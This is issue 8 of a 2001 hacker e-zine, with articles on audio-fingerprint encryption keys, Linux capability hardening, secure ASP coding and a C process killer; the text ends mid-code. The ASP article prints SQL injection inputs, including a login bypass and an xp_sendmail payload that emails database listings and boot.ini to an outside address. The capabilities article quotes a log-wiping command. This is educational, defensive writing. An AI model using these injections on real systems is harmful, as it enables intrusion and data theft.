..... ..........................[_]
::: ::: ::: ....... :
.... ........ ::: ........ :::..... ... .... ........ ........ ........
::: ::: :::: ::::: ::: :::: .. :::: ::: :::: ::: :::: ::::.::: :::.::::
.::: ::: :::: ::: :::.:::: :::.:::: :::.:::: ::: .... ::: :::.....
: ::::.:::
..:[ issue 8 ]:.......:
................:
:
.......[ ]...............................................
: :
: Official Web Site - http://infosurge.rendrag.net :
: :
: Official Submissions - phase5@cmdrkeen.net :
: Issue Editor - lym@thepentagon.com :
: :
:..[_].............................................[_]..:
: Issue #8: 02/03/2001 :
: :.
:.:[ ] infosurge - we put the leet in obsolete :
.:
.............................................:
:
......[ ]......................................................................
: :
: Contents Author :
: ---------- -------- :
: :
: #01 Using digital audio fingerprints in encryption - jestar :
: #02 Hardening a Linux system with Capabilities - fyre :
: #03 Secure Web Applications On Windows NT with ASP - black-hand :
: #04 An automated process killer for Linux (in C) - icebsd :
: #05 Phone extension warning device - Black_Smurf :
: #06 UNIX Security - lymco :
: #07 Example configuration of an OpenBSD firewall - aphex :
: #08 History of 3d acceleration - Maticles :
: :
: TOTAL - 99kb :
: :
:..........................................................[_]................:
:
.......:
:
....................................................[ ].......................
: :
: #01 Using digital audio fingerprints in encryption - jestar :
: ---------------------------------------------- :
:.[_]........................................................................:
:
...:
:
: Ok, it's been a while since I've written anything and I honestly dont
: know if this is being pursued or has been written up by anyone else but
: a quick search and also my research on fingerprinting schemes didn't turn
: anything up. I'm crapping on, so to cut it short this is my disclaimer
: and if im stealing any ideas you've already thrown out to the world I can
: assure you I didnt know, if you wanna pursue me any further than that I
: suggest fucking off.
:
: Ok onto the article. Just recently I was putting a bit of thought into
: the current encryption schemes out there and on key distribution as well
: as key generation and I remember seeing on a news site that there was
: a group of people working on an algorithm that would boil any audio
: file down to a digital signature representing that piece of audio.
: This signature would be unique to each song, but not to each recording
: of that song. What that means is that if you were using a song, the
: fingerprint created from an audio file taken from the radio *should*
: be identical to one created from a cd. Whether this turns out to be
: true is another matter altogether. The group in question is TunePrint
: (www.tuneprint.com) I guess if your interested you probably want to take
: a gander at the site now before continuing with the article.
:
: Heres the idea. You take your plaintext message and think "well, I want
: to send this to mum but I dont want the NSA peeking at it" (I'm sure
: we all like to send heavily encrypted shopping lists to our mothers)
: so you decide to encrypt it (that'll foil them *cough*). Now currently
: you would probably use some sort of public/private key deal which is
: all well and good, but there's still the matter of key transfers etc. So
: say instead you decide to take a fingerprint of your mums favourite
: song (probably something by the rolling stones or an 80's hair band,
: unless your phase in which case its probably 'i sucked a lot of cock to
: get where i am' by regurgitator) and you use the generated fingerprint
: to encrypt the message. You then send the ciphertext to your mum and a
: few days later phone her up and tell her what song it was encoded with
: using some ultra cool oh no black helicopters and sunnies covert message,
: probably "i really like this new song ...... you should listen to it".
: She knows this is the key now and creates a fingerprint which she then
: uses to decode it. Wether or not she then has to eat the fingerprint,
: audio file and plaintext message is up to you.
:
: Of course there's a few problems with the idea put forward here, the
: main one being that the digital fingerprinting tech in question could
: be vapourware, or may not end up being as robust as they are hoping,
: making variance in fingerprints too great to actually be useful. Also it
: would require previous setting up of the way to let the other part know
: what audio was used, but once again, I'm just throwing out some ideas I
: had. If you have any comments or suggestions, or just want to tell me I'm
: dreaming drop me a line at jestar@rendrag.net and all messages will be
: given the appropriate attention (take that as you will).
:
:....
:
...[ ]........................................................................
: :
: #02 Hardening a Linux system with Capabilities fyre :
: ---------------------------------------------- :
:.[_]........................................................................:
:
...:
:
: Introduction
: ============
:
: Linux 2.2[1] introduced an important new security feature called
: `capabilities', which, if used properly can both reduce the dependence of
: some programs on root privileges, and at the same time make the superuser
: far less powerful than they would be on a traditional UNIX system.
:
: In this article, we're going to discuss how to use capabilities to harden
: a Linux system; that is, assume there are going to be vulnerabilities and
: work out a way to reduce the damage potentially caused by them.
:
:
: [1] It was Linux 2.1 that introduced capabilities, but 2.2 was the first
: stable series to include them, and the bounding capability set idea took
: until .11 to make it in.
:
:
: Capability List
: ===============
: To whet your appetite with what capabilities can do, here's a list of the
: capabilities supported by Linux 2.4.1 (the current stable kernel as of
: this writing):
:
: Name Meaning
: --------------- ---------------------------------------------------
: CAP_CHOWN Allow changes to user and group ownership of files.
: CAP_DAC_OVERRIDE Override all DAC restrictions.
: CAP_DAC_READ_SEARCH Override all read/search DAC restrictions.
: CAP_FOWNER Override all restrictions about file ownership
: CAP_FSETID (not implemented)
: CAP_KILL Override restrictions on sending signals to
: processes not owned by the current effect user id.
:
: CAP_SETGID Allows setgid(), setgroups(), etc.
: CAP_SETUID Allows setuid().
: CAP_SETPCAP Allows transfer/removal of capabilities from
: current process to another process.
:
: CAP_LINUX_IMMUTABLE Allow modification of immutable (+i) and
: append-only (+a) ext2 filesystem attributes.
:
: CAP_NET_BIND_SERVICE Allow binding TCP and UDP sockets to port numbers
: below 1024.
:
: CAP_NET_BROADCAST Allow broadcasting.
: CAP_NET_ADMIN Misc. network admin functions, most notably setting
: promisc. mode.
:
: CAP_NET_RAW Allow use of raw sockets.
: CAP_IPC_LOCK Allow locking of shared memory segments, and
: disabling paging.
:
: CAP_IPC_OWNER Override IPC ownership checks.
: CAP_SYS_MODULE Insert/remove kernel modules, modify bounding cap.
: set.
:
: CAP_SYS_RAWIO ioperm/iopl access, USB.
: CAP_SYS_CHROOT Allow the chroot system call.
: CAP_SYS_PTRACE Allow ptrace of any process.
: CAP_SYS_PACCT Allow control of process accounting.
: CAP_SYS_ADMIN Misc. admin features, including mount, setting host
: and domain names, random device, disk quotas, other
: hardware config changes.
:
: CAP_SYS_BOOT Allow system reboot, halt, etc.
: CAP_SYS_NICE Allow raising priority of this and other processes.
: CAP_SYS_RESOURCE Override resource limits, disk quotas, etc.
: CAP_SYS_TIME Allow setting of system clock.
: CAP_SYS_TTY_CONFIG TTY device configuration.
: CAP_MKNOD Allow special files to be created.
: CAP_LEASE Allow taking leases on files.
:
: 2.2 series kernels seem to support all of these capabilities, with the
: exception of CAP_LEASE, which is new for 2.4. An up-to-date list of
: capabilities with brief descriptions is usually available in
: /usr/include/linux/capability.h.
:
:
: Bounding Sets
: =============
:
: Linux 2.2.11 introduces the concept of `bounding capability sets', which
: can be used to remove certain capabilities so that no process can use
: them, not even ones own by the superuser. The only way to get the
: capabilities back[2] is to reboot. This feature can be used to limit what
: a cracker can do if they somehow get root on your system.
:
: Some examples:
: * Stop script kiddies clobbering your system logs (as is their habit) by
: making the log files append-only (chattr +a) and removing the
: CAP_LINUX_IMMUTABLE capability.
: * Stop LKM rootkits from functioning by disabling CAP_SYS_MODULE.
: * Stop sniffers being run on a compromised machine by removing
: CAP_NET_ADMIN and perhaps CAP_NET_RAW.
:
: The command most often used to manipulate the bounding capability set is
: lcap, written by spoon@ix.netcom.com. It's available for download in
: source and RPM formats for download from
: http://home.netcom.com/~spoon/lcap/download/. If you're using the current
: unstable dist of Debian (sid), you should be able use apt-get in the usual
: way to install lcap. The examples in this article assume lcap 0.0.3, but
: any later version will do.
:
: To use lcap, type 'lcap' followed by the name or names of capabilities you
: want to remove. For example:
: # lcap CAP_NET_RAW
: will remove the raw socket capability, breaking among others ping,
: traceroute, and tcpdump for even the superuser. But before you start
: playing with lcap yourself, read on for some potential pitfalls and tips.
:
: The most common place to modify capabilities is in your init scripts,
: after all privileged daemons have been launched and the hardware
: configured. I run lcap from rc.local right after tuning my hard drive
: parameters with hdparm (which requires hardware access). I shouldn't need
: to point it out, but don't experiment with capabilities on production
: machines. Chances are something will go wrong and you'll be forced to
: reboot (or worse!).
:
: There are a number of common problems encountered by those using bounding
: capabilities, and nastiest of these usually show themselves when shutting
: down or rebooting the system. Removing CAP_SYS_ADMIN, for example, will stop
: you being able to unmount the filesystems, potentially resulting in
: corruption or other damage. If CAP_SYS_BOOT is removed, the system will
: refuse to reboot or power down. This may cause damage on some hardware,
: but not unmounting the filesystems may be worse. Don't play with
: capabilities on production machines, or bad things may happen.
:
:
: [2] Only if the right capabilities are set. Patrick Reynolds demonstrates
: in a post to Bugtraq entitled "Linux capability bounding set weakness" how
: to get capabilities back if CAP_SYS_RAWIO and CAP_SYS_MODULE are not
: disabled. As he suggests, you should always remove these capabilities if
: you've removed any others.
: (Ref: http://archives.neohapsis.com/archives/bugtraq/2000-06/0276.html)
:
:
: In Practice: Securing the Log Directory
: =======================================
:
: In this example, we'll make it so that even the superuser cannot do
: anything but append to the system logs - once a message is logged, it's
: very difficult to remove it (at least from a remote machine).
:
: To begin with, we make our log files append-only with the chattr command:
: # chattr +a /var/log/*
:
: Then, we make the /var/log directory immutable (ie. no changes are
: allowed):
: # chattr +i /var/log
:
: Finally we remove the CAP_LINUX_IMMUTABLE capability from the kernel,
: which allows changing of +a/+i bits on files, and remove the other
: capabilities that are always required (see footnote in previous section
: for an explanation):
: # lcap CAP_LINUX_IMMUTABLE CAP_SYS_RAWIO CAP_SYS_MODULE
:
: We're all done. If you didn't encounter any errors while executing the
: above commands, your log files should be fairly well protected. Try
: removing one to make sure it's not possible, then try using logger(1) to
: log a message to make sure syslogd can still write to the log files.
:
: Note: making /var/log immutable and the files in it append-only breaks the
: log rotation features present in many Linux distributions. I don't know
: any (secure) way around this.
:
:
: Conclusion
: ==========
:
: Although the current Linux capabilities section is far from perfect, it
: definitely does `raise the bar', and may confuse and deter unskilled
: crackers (our friends the script kiddies). The look on Joe Haxor's face
: when he tries the script kiddie staple command `rm -rf /var/log' and it
: fails would be priceless.
:
:....
:
...[ ]........................................................................
: :
: #03 Secure Web Applications On Windows NT with ASP - black-hand :
: ------------------------------------------------ :
:.[_]........................................................................:
:
...:
:
: By black-hand black.wiretapped.net
:
: ASP (Active Server Pages) is a server-side scripting environment developed
: by Microsoft for IIS servers on Windows operating systems. ASP is used to
: create dynamic web pages and is the glue between components in creating
: large web-based applications. By default, IIS will handle all files
: with the .asp extension as ASP scripts, and pass these scripts through
: components and applications to handle the server side scripting. ASP has
: the capability to integrate multiple scripting and markup languages,
: as well as technologies such as COM and Java. The default scripting
: language assumed in ASP scripts is VBScript, a scripting language based
: upon Visual Basic.
:
: Using ASP, it is possible to generate very flexible, dynamic and large
: web based applications, integrating backend web processing and storage
: with client-side (front-end) scripting and HTML.
:
: The level of security in an ASP application or web site is dependent upon
: the developer. There are no built-in mechanisms in IIS to audit and monitor
: intrusions or misuse of a web based application. A security audit of code
: should be carried out as part of the testing and debugging procedure of
: a project. This paper aims to outline common mistakes in ASP programming
: that an attacker can use to compromise system data, and how to develop good
: programming and administration practices to defend against these attacks.
:
: This document will assume that you have some knowledge of basic scripting
: and/or ASP pages.
:
:
: Basic ASP ----------
:
: When deciding upon what tool to use to develop a project, an ASP
: developer is faced with a number of choices. Larger IDE's (Integrated
: Development Environments) take a lot of the work out of writing ASP, as
: common functions and procedures can be dropped into the project easily
: (such as tables, database connections etc.). A more 'purist' approach
: would be to use a simple text editor and other individual programs to
: assist in the development process. There are advantages and disadvantages
: associated with either, and it is usually up to the developer to make
: their own decision based on what they are comfortable with.
:
: The following is a basic ASP page:
:
:
<%
: response.write "Hello world"
: %>
:
: The above script should produce the words "Hello world" printed on the
: screen. The following HTML would have been produced by the server and
: sent to the client.
:
: Hello world
:
: So what happened? The client made a request for an ASP script, IIS passed
: this script through the relevant handler and interprets all scripts
: between the <% %> tags. These are ASP opening and closing tags, everything
: between these tags in an ASP script will be interpreted as VBScript by
: default. Next, the VBScript interpreter told the response.write object to
: print back the parameter passed to it ("Hello world") to the client. No
: part of the server-side script is seen by the client - the client only
: sees the output result of operations conducted on the server.
:
: Scripting can be used on the server side to make output dynamic. An
: example would be content for a site being extracted from an SQL server,
: or from a file. Another example would be to increment a counter each time
: a page is fetched, so that records of numbers of visitors to that site
: can be maintained.
:
: The following script will print a loop
:
:
: <% for x=1 to 10 %>
: Printing this text <%=x%>
: <% next %>
:
:
:
:
: This will produce the following output to the browser
:
: Printing this text 1 Printing this text 2 Printing this text 3 ..
:
: From that example we can see that there can be multiple instances of
: server-side code within an ASP script, and that a function can span
: multiple code sections. Printing the variable x was achieved by calling
: the variable with an = sign immediately after the opening script tag.
:
:
: User Input ----------
:
: The previous example pages were rather dull. To make a page more
: interactive would require input from the user on the client-side. The
: requirements for user input are a client-side HTML form to pass data to our
: ASP script, and then the server-side code within the ASP script that will
: then process it. Web-based forms are a popular method to obtain information
: from users. A simple example of a HTML page with a form follows here:
:
:
:
: That HTML will produce a simple login screen that will submit the values
: of the two fields (username and password) to the logon.asp script when the
: "Login" button is pressed.
:
: With logon.asp, we have to be able to accept this input into the script,
: and react accordingly. The inputs into the script are the username and
: password entered by the user at the previous HTML page, and the output
: is either going to be "access allowed" or "access denied" depending on
: the username and password combination entered.
:
: Firstly, the user input is taken into the ASP script and stored in
: variables using the request.querystring object.
:
: <%
: Dim username, password ' declare variables
:
: uname = request.querystring("username") pass =
: request.querystring("password")
:
: This will take the values passed to the script from the HTML form and
: place them into the uname and pass variables respectively. Secondly, we
: decide based on the value of these variables what output we are going to
: produce and inform the user.
:
: if uname = "user" and pass = "pass" then
: response.write "access allowed"
: else
: response.write "access denied"
: end if
: %>
:
: If the passed in username is "user", and the password is "pass", then the
: user will be informed that their login was allowed, otherwise that
: their login was denied. Of course, after being shown that the user has
: logged in, they will proceed through to a members or otherwise normally
: restricted section of the site, and users whose login was denied will be
: redirected back to the main HTML login screen to attempt again.
:
:
: File Access ------------
:
: The FileSystemObject object allows access to files stored on the
: server. The following example will write a file to the system. Note
: that it is writing the file to the server drive, not to the drive of the
: client connecting.
:
: <% Dim fso, test Set fso = CreateObject("Scripting.FileSystemObject") Set
: test = fso.CreateTextFile("c:\\testfile.txt", True) test.WriteLine("This
: is a test.") test.Close %>
:
: If you open testfile.txt in a text viewer, you should be able to see the
: "This is a test." line that we wrote to it.
:
: Reading files is also very similar, we can read the file line by line or
: character by character and store it into variables to use the data.
:
: Dim fso, f Set fso = CreateObject("Scripting.FileSystemObject") Set f =
: fso.OpenTextFile("c:\\testfile.txt", ForReading) Test = f.Read(5)
:
: The variable "test" will contain the first 5 characters of the testfile.txt
: file.
:
: The FileSystemObject can also be used to add, change, move, create and
: delete files and folders. This ability makes the FileSystemObject very
: powerful and useful.
:
:
: Database Access ----------------
:
: Databases are used to store data in an organized manner, making it easier
: and faster to store and retrieve records. In VBScript there are a number
: of data access methods, with the most common for server-side access being
: Microsoft ADO (ActiveX Data Objects).
:
: Using ADO, you can dynamically create an object to store, manipulate and
: navigate through data returned from a database.
:
: The following code creates an ADO connection, and then associates a new
: recordset object with the connection.
:
: Dim connection as New ADODB.Connection connection.Open ConnectionString,
: UserID, Password
:
: Dim recordset as ADODB.Recordset Set recordset = New ADODB.Recordset
: recordset.Open Source, ActiveConnection, CursorType, LockType
:
: The "source" option in the recordset defines the SQL query set to be
: returned into the object. We can then iterate through the returned
: recordset, and manipulate the data. The following example will print a
: single field from each record on a line from a returned recordset:
:
: set RECORDSET = CreateObject("ADODB.RecordSet")
: RECORDSET.ActiveConnection = "ODBCCONNECTION" RECORDSET.CursorType
: = 0
:
: RECORDSET.source = "select field from table"
:
: RECORDSET.Open If RECORDSET.BOF <> True or RECORDSET.EOF <> True then
: Do Until RECORDSET.EOF
: Response.write RECORDSET("field") & "
"
: Loop end if
:
:
:
: Securing User-Supplied Input ----------------------
:
: In a previous example, we saw a simple demonstration of an ASP script
: handling a login screen and authenticating a user. Very rarely would you
: see an example in the real world that functions in the same way. A more
: stable and secure solution would have to check the user input passed
: as well as accounting for a lot of other factors.
:
: An attacker can manipulate the data passed to the script so that unexpected
: events occur. An "unexpected event" can be used by an attacker to access
: a restricted "members" sections, or to access database information.
:
: The following is a typical script used to handle logins by querying a
: database to extract username/password information:
:
: Dim uname, pass
:
: uname = request.querystring("username") pass =
: request.querystring("password")
:
: set LOGIN = CreateObject("ADODB.RecordSet") LOGIN.ActiveConnection
: = "ODBCCONNECTION" LOGIN.CursorType = 0
:
: LOGIN.source = "select * from users where uname='"&uname&"'
: and _ pass='"&pass&"'"
:
: LOGIN.Open If LOGIN.BOF = True or LOGIN.EOF = True then
: response.redirect "default.asp" ' failed login
: else
: response.redirect "members.asp" ' logged in
: end if LOGIN.Close
:
:
: The username and password parameters are inserted into an SQL query,
: and then the results of this query are returned into a recordset.
: If the username and password are found, then it will return the full
: record from the database from that user within the recordset. If the
: username and password combination are not found then it will return an
: empty recordset. The if statement checks checks to see that there has
: been a record returned in the recordset. If the recordset is not empty,
: it means that the username and password combination executed by the SQL
: query return a record. Otherwise the username and password combination
: did not return a valid user record.
:
: A successful login will redirect the user to the members.asp page, a failed
: login will redirect the user to default.asp. The username and password
: parameters are passed to the ASP script via a web form, or manually passed
: to the script by appending variable names and values to the URL.
:
: http://www.server.com/login.asp?username=kevin&password=test123
:
: The above example will pass the values "kevin" and "test123" as the
: username and password, and these values will be directly stored into our
: server side variables.
:
: The script then takes the values that are passed and inserts them
: directly into the SQL query, meaning that we are able to pass the script
: values that directly modify the SQL query that is executed.
:
: As an example, we will pass the following to the script, and then
: investigate how the SQL is executed and what result is produced:
:
: username: 1 password: 1' or pass <> '1
:
: The code used to construct the SQL query is as follows:
:
: "select * from users where uname='"&uname&"' and pass='"&pass&"'"
:
: If the query is then constructed with the variables that we are passing
: in, the following query will be executed.
:
: "select * from users where uname='1' and pass='1' or pass <> '1'
: _ _________________
:
: The two inputs that we passed into this query are underlined, and it
: can be seen that because of the password that we have supplied
: we have as a result returned every record in the database, thus allowing
: us access to members.asp without a real username or password. This is
: because the SQL is extracting every record where pass is equal to 1,
: as well as every record where pass is NOT equal to 1, which of course,
: is every record in that table.
:
: The Microsoft SQL server also supports being able to execute multiple
: SQL commands on one line and in one query. So in the previous example,
: with a bit of tinkering we can INSERT new records or DELETE records. As
: a more complex example, Microsoft SQL server comes with some stored
: procedures that will email the result of an SQL query to an email
: address. The following is the syntax for that query, we simply pass it
: into our password field and it will execute as part of the whole query.
:
: EXECUTE master.dbo.xp_sendmail "suspects@2600.org.au","","select * from
: sysdatabases", "C:\\boot.ini" --'
:
: Passing those parameters to the stored procedure will email the results
: of the query "select * from sysdatabses" to suspects@2600.org.au. As an
: extra bonus, the xp_sendmail stored procedure allows you to attach any
: file to the email from the system. In the above example we have attached
: c:\\boot.ini to the email. The sysdatabases table is a system table that
: contains the names and information of all databases on the SQL server,
: which can come in handy. Further investigation into the system databases
: and stored procedures that are installed by default with Microsoft SQL
: Server will result in more possibilities, such as being able to change
: permissions and executing commands on the server.
:
:
: Filtering Input ----------------
:
: As a solution to unexpected passed input, we can develop a function to
: wrap around variables containing user input to filter out characters that
: are deemed "unnecessary" or dangerous.
:
: The following function will strip unnecessary characters from the passed
: input.
:
: Function SQLFilter(str)
: Dim regEx Set regEx = New RegExp regEx.Pattern = "A-Z,0-9"
: regEx.IgnoreCase = True SQLFilter = regEx.Replace(str, "")
: End Function
:
:
: IIS Security Holes. --------------------
:
: There are a number of generic IIS security holes that could assist an
: attacker in compromising a remote database and system. These security
: holes can be used to view the full source to a server side scripts.
: Thus a developer should never assume that the script source is secure
: when developing their site or application.
:
: Common mistakes include servers hosting sample scripts and directories,
: or running versions of remote data access and IIS services that are known
: to contain security holes.
:
: These holes are common and are discussed in my IIS security article
: located at:
:
: http://black.wiretapped.net/iis.txt
:
:
: More Programming Errors -------------------------
:
: It is common for a developer to include test and debug modes into
: applications for development and debugging purposes, and this is only
: secured by the fact that in a production environment a remote user would
: not be able to view server-side code.
:
: One such example is an online store that had a debug mode for testing
: purposes that allowed a user to specify a discount on product and view
: debug information, such as SQL statements. Enabling the debug mode was
: as simple as parsing the variable "debug" to equal 1 as such
:
: http://www.server.com/shop.asp?productid=435&debug=1
:
: This was uncovered by using an IIS security hole to view and analyze
: the source to the ASP scripts. At the top of the ASP script there was
: something similar to
:
: <%
: Dim debug debug = request.querystring("debug")
:
: [..]
:
: if debug = 1 then
: response.write RECORDSET.Source
: end if
: %>
:
: Such common programming errors are common and can lead to interesting
: finds by curious and persistent web surfers.
:
: Other possibilities include scanning for backups of server side scripts
: by appending common backup extensions to filenames. It is common for
: some development environments and editors to create backups of files,
: or for administrators to manually create backups before making changes.
:
: An example would be UltraEdit's (www.ultraedit.com) default practice of
: creating a copy of each file open with a .bak extension. Since the .bak
: extension has no default association in IIS, it can be viewed as a normal
: text document when it is requested in a web browser.
:
: A document on this is available on my website at:
:
: http://black.wiretapped.net
:
:
: Session State ---------------
:
: Once a user has logged in, it is important to track the status and
: permissions of each user on the server side. There are a number of methods
: that can be used to do this, including cookies, IIS authentication, or
: server side session value storage. At a simple level, keeping track of
: session state could simply mean checking a Boolean value to see if the
: requesting user has permissions to that resource.
:
: On login, the application would set a Boolean value to true If the login
: was sucessful:
:
: LOGIN.Open If LOGIN.BOF = True or LOGIN.EOF = True then
: session("logged") = 0
: response.redirect "default.asp" ' failed login
: else
: session("logged") = 1 response.redirect "members.asp"
: ' logged in
: end if LOGIN.Close
:
: A successful login would set the server-side variable "logged" to be
: equal to one. A new set of server-side variables are spawned for each
: user, and are identified at the server-web browser level using unique and
: random 64-bit strings generated by the server, making the probability of
: hijacking another users session difficult (assuming that the method of
: random number generation used by IIS is "random enough").
:
: When access permission to a restricted resource or differentiation between
: different levels of user is required, we simply read out the value stored
: in this session variable.
:
: Such an example would be to make a simple check at the top of a page that
: the developer wishes to restrict access to.
:
: <% if session("logged") <> 1 then
: response.redirect "default.asp?error=login"
: end if
: %>
:
: If the session variable "logged" had been set to 1 during login time,
: then access to the rest of the script would be allowed, otherwise the
: request would be redirected to the default page and an error recorded.
:
: This method prevents "backdoor" / "deep linked" access to parts of a
: site, and ensures that only users with particular privilege level are
: allowed access. The checking routing can be placed in an include file,
: and included as part of each script where access has to be tracked:
:
:
:
: Other variables that are commonly stored in session variables include
: usernames, and different levels of permissions. Session variables are
: cleared on the server after a default 20 minutes of inactivity.
:
:
: Microsoft SQL Server ---------------------
:
: A very common but often unknown problem with Microsoft SQL server 7.0 is
: that it contains a default "sa" account with a blank password. To exploit
: this, an attacker simply uses the SQL management console to connect to
: your SQL server and view databases information, or change permissions
: and execute system commands using the extended stored procedures.
:
: It is extremely important that this default account is removed, and that
: access to port 1433 (the port that the Microsoft SQL server binds to)
: is blocked from all hosts except the IIS Server. In an ideal situation,
: the SQL server would be in a non-routable private address range away from
: a live network segment to restrict remote access.
:
: There is now a Linux command line client that can be used to access
: and scan for Microsoft SQL servers called linsql.c, it is available for
: download from packetstorm (http://packetstorm.securify.com), it requires
: the freeTDS library.
:
: Conclusion ------------
:
: Despite all the hype, ASP is and can be relatively secure. All it takes
: is good programming practice and a secure and patched IIS server.
:
: The purpose of this document was to be a basic introduction to secure
: ASP programming practices, and is meant to compliment reference material
: (http://msdn.microsoft.com) and programming experience.
:
: Copyright 2001, black-hand
: (black@wiretapped.net, http://black.wiretapped.net)
: This document may only be reproduced in full.
:
:....
:
...[ ]........................................................................
: :
: #04 An automated process killer for Linux (in C) - icebsd :
: ---------------------------------------------- :
:.[_]........................................................................:
:
...:
:
: An automated process killer for Linux (in C)
: -- icebsd
: =======================================================
:
:
: As fun as system administration goes, most of the chores done by a system
: administrator are often 1) redundant, 2) unimportant, 3) more often than
: not, they get blamed for the consequences of their actions. So the
: question that came into my mind today (today being a boring Saturday), was
: whether or not a program could be made to emulate the task of your typical
: bastard administrator from hell (BAFH - a spin off from BOFH).
:
: The idea was to create a process killer which would kill processes based
: on certain attributes of the process. The reason for using Linux was
: obvious: the /proc filesystem is easy to use.
:
: In my initial thoughts of construction, I had devised the main objectives
: of the program:
:
: 1) It must raise it's priority higher than other programs.
: - i.e. posix scheduling on linux, or setpriority()
:
: 2) It must be quick, and use a small amount of memory.
: - i.e. no dynamic memory, e.g. link lists :)
:
: 3) It doesn't have to be run by root, although running the program
: as root would *really* provide you with an automated BAFH.
: - i.e. johnsmith can run it too.
:
: 4) It should have emergency shell access, with higher priority
: than the program.
:
: 5) It would obviously need to read the /proc filesystem, and
: calculate the appropriate values and compare them with the user
: defined threshold levels.
: - i.e. /proc fs stats, and algorithms.
:
: 6) Finally, it should not kill processes run by "root" unless the
: user defined it to do so.
:
: I will now write about the topics listed above which describe the program
: in a non-reproducing way, in the hopes of the reader being able to make
: the program themselves before actually seeing mine. (source attached at
: the end of this text file.)
:
: 1) Raising Priority
: --------------------
: Raising the priority of a process can be done in two ways on a linux
: system. One way is via the nice() system call, which allows the user to
: modify the priority of the program to a higher state, but still allows the
: kernel to drop its priority back down.
:
: Another way is to use the POSIX scheduler functions to elevate the
: program's priority to near "real-time" scheduling. Once it is in this
: mode, it will have higher priority than any other program not in real-time
: mode and cannot be dropped back down by the kernel. This is also known as
: a static priority.
:
: To do this, you would use:
:
:
: struct sched_param sp;
: sp.sched_priority = priority; /* assign priority */
: sched_setscheduler(pid, SCHED_FIFO, &sp); /* posix function */
:
:
: In my program, I wrapped that into another function called
: raise_priority(). This function uses the generic UNIX function
: setpriority() as a backup if posix doesn't work (which wouldn't
: happen on linux systems anyway).
:
: 2) Small and fast. Nothing fancy
: --------------------------------
: Because the program is now running at a scheduling level which could cause
: the system to slow down or crash, ideally a small and fast program would
: be better than a comparatively larger and slower (yet more fancy) program.
:
: Initially, the idea is to read from the /proc without having to store too
: much information in the RAM, such as using a linked list or something
: similar. The functions to read from directories such as scandir() would be
: inappropriate. A simple call to readdir() would suffice. Let's see why.
:
:
: NAME
: scandir, alphasort - scan a directory for matching entries
:
: SYNOPSIS
: #include
:
: int scandir(const char *dir, struct dirent ***namelist,
: int (*select)(const struct dirent *),
: int (*compar)(const struct dirent **, const struct dirent
: **));
:
:
: Scandir looks very convenient. It reads a string in the first argument,
: and provides the vector namelist with a lovely pre-malloc() data which you
: have probably free later on. Convenient, but expensive.
:
:
: NAME
: readdir - read a directory
:
: SYNOPSIS
: #include
:
: #include
:
: struct dirent *readdir(DIR *dir);
:
:
: This call is obviously better for this program, as there are less data
: allocated in RAM as readdir() returns a static structure. However, this is
: also less convenient as far as searching or sorting goes, but for this
: program it is fine.
:
: 3) And the question is: to run as root, or not to run as root.
: ---------------------------------------------------------------
: Obviously, to raise your priority you need root access, but to have the
: functionality for the rest of the program, you can still use a normal
: user. So a simple compromise was made: you can run as both, but you can't
: do as much if you run the program as a normal user. i.e. you can only
: automatically kill your own processes.
:
: 4) A 'real-time' shell
: ----------------------
: A real-time shell is easily provided by forking the process and elevating
: the process to maximum priority. This provides the user with the ability
: to kill it's own program, should it happen to spin out of control.
:
: This was done in my program by calling raise_priority(1) instead of
: raise_priority(0)
:
: 5) Getting something useful from /proc
: --------------------------------------
: Firstly, to quickly brief on the /proc filesystem:
:
: * Every numeric directory is a pid (process id)
: * Inside a pid pseudo-directory, there are files which correlate to the
: attributes of the process.
: * The (UID) owner of the pseudo-directory is the owner of the process.
:
: In particular, the "stat" file is the one we're after. This file contains
: the attributes for start time, total cpu time, etc. Another file also
: important is the "/proc/uptime" which you have to use to calculate the
: values, as the /proc filesystem basis it's timings on when the system was
: "started". They also judge their timings based in 1/100th of a
: second. This also means the uptime and process timers will wrap around
: eventually.
:
: At first glance, it's ambiguous. But after looking through the procps
: package, which contains the source code for "ps" and "top", it wasn't too
: difficult to assimilate the structure.
:
: bash$ cat /proc/1/stat
: 1 (init) S 0 0 0 0 -1 256 43 7891 160 18324 1 338 279 269 0 0 -1 0 30
: 901120 86 2147483647 134512640 134529764 3221225284 3221224232 1073873768
: 0 0 3622886140 671818755 1236245 0 0
:
: The first value is the PID of the program (which should also be the
: directory name too.) The word in parenthesis is the name of the program,
: as provided when executed via an execve() call.
:
: The "S" character is the state character. It stands for "sleep". Most
: processes tend to do this, that is, idle and sleep. Other process have "R"
: which indicate that it's running and using CPU time.
:
: After the state character, we'll refer to it the 1st real value, since
: the values after the state character that we really care about, so to
: make things short I'll only explain the values you need to know.
:
: The 11th and 12th value are utime and stime respectively. Combined, they
: provide the attribute for "total cpu time actually used". This is not the
: same as "length of program time", which is described by the 19th value.
:
: The reason for this difference is that the "total cpu time actually used"
: is often less than the "length of program time" because of multi-tasking,
: which basically means the process only gets a slice of cpu-time, and not
: hog it 100% of the time.
:
: Two other values need to be known. That's the system uptime, which is from
: "/proc/uptime" -- it's the first value. And the current system time, which
: is gained via the C library's time() function.
:
: From there on, we can devise a simple formula to calculate the values we
: need:
:
: process_seconds = ((system_uptime * 100) - p_start) / 100;
: process_tstart = system_time - process_seconds;
: process_total_time = p_utime + p_stime; /* this is
: in 1/100th second */
:
: * process_seconds is the total length of time the program has been
: running, (in seconds of course). The 19th value we got (from
: /proc/###/stat) was actually a 1/100th of a second time value based from
: the start of system. Hence the usage of system_uptime in the formula
: above.
:
: * process_tstart is the start time, in time_t format (i.e. based on the C
: library's time(), instead of the system uptime)
:
: * process_total_time is the total amount of CPU time that has actually
: been used in 1/100th of a second.
:
: From those values, we can calculate the PCPU (percentage of the cpu used
: by the process) by dividing the process_total_time (once you convert it to
: seconds) with process_seconds and multiplying by 100 to get a percentage.
:
: Because process_total_time is in 1/100th of a second, it's value is as if
: it had already been multiplied by 100, so we don't need to do it.
:
: pcpu = process_seconds ? (process_total_time / process_seconds)
: : 0.0;
:
: (The ?-condition is to check to see if process_seconds is zero, to prevent
: a division by zero error.)
:
: By using the above values, you can check a user defined threshold for
: killing or nice() the process to something more appropriate.
:
:
: /* check for nice threshold */
: if ((process_seconds < NICE_TIME) || (pcpu < NICE_PCPU)) {
: continue;
: }
: else {
: /* nice() the process using setpriority() */
: /* note: should probably check via getpriority()
: * but it doesn't really matter.
: * since you don't save a system call either way.
: */
: if (setpriority(PRIO_PROCESS, pid, NICE_VAL) == -1) {
: perror("setpriority - nice failed");
: }
: }
:
: /* check for kill threshold */
: if ((process_seconds < KILL_TIME) || (pcpu < KILL_PCPU)) {
: continue;
: }
: else {
